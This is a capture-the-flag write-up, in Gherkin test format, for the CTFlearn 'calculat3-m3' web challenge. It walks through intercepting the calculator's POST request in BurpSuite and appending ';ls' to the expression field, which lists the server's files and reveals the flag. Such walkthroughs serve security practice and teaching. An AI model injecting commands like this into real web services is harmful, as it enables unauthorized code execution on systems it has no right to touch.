## Version 2.0
## language: en

Feature: calculat3-m3 - web - ctflearn
  Site:
    https://ctflearn.com/problems/150
  User:
    adrianfcn (ctflearn)
  Goal:
    Obtain the flag

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Debian          | buster      |
    | Firefox         | 60.9.0      |
    | BurpSuite       | 2.1.02      |
  Machine information:
    Given I have accessing the site "http://web.ctflearn.com/web7"

  Scenario: Success: command injection
    Given the flag it is inside of "ctf{}"
    And I am on the web site "http://web.ctflearn.com/web7"
    And I can see a functional calculator [evidence1](image1.png)
    When I see the source code
    Then I realize that this use a post request
    """
    <form action='.' method="post">
    """
    And I open BurpSuite
    And I intercept this request
    """
    POST /web7/ HTTP/1.1
    Host: web.ctflearn.com
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
      Firefox/60.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://web.ctflearn.com/web7/
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 11
    Cookie: __cfduid=d35a6890d2b1d77bdac5adf581831100a1570216855
    Connection: close
    Upgrade-Insecure-Requests: 1

    expression=
    """
    And I modify a part of the petition "expression=" to "expression=;ls"
    When I send the modified petition
    Then I can see on the web site
    """
    calc.js ctf{xxxxxxxxxxxxxxxxxxxx} index.php main.css main.css
    """
    And I obtain the <flag>
    And I solve the challenge
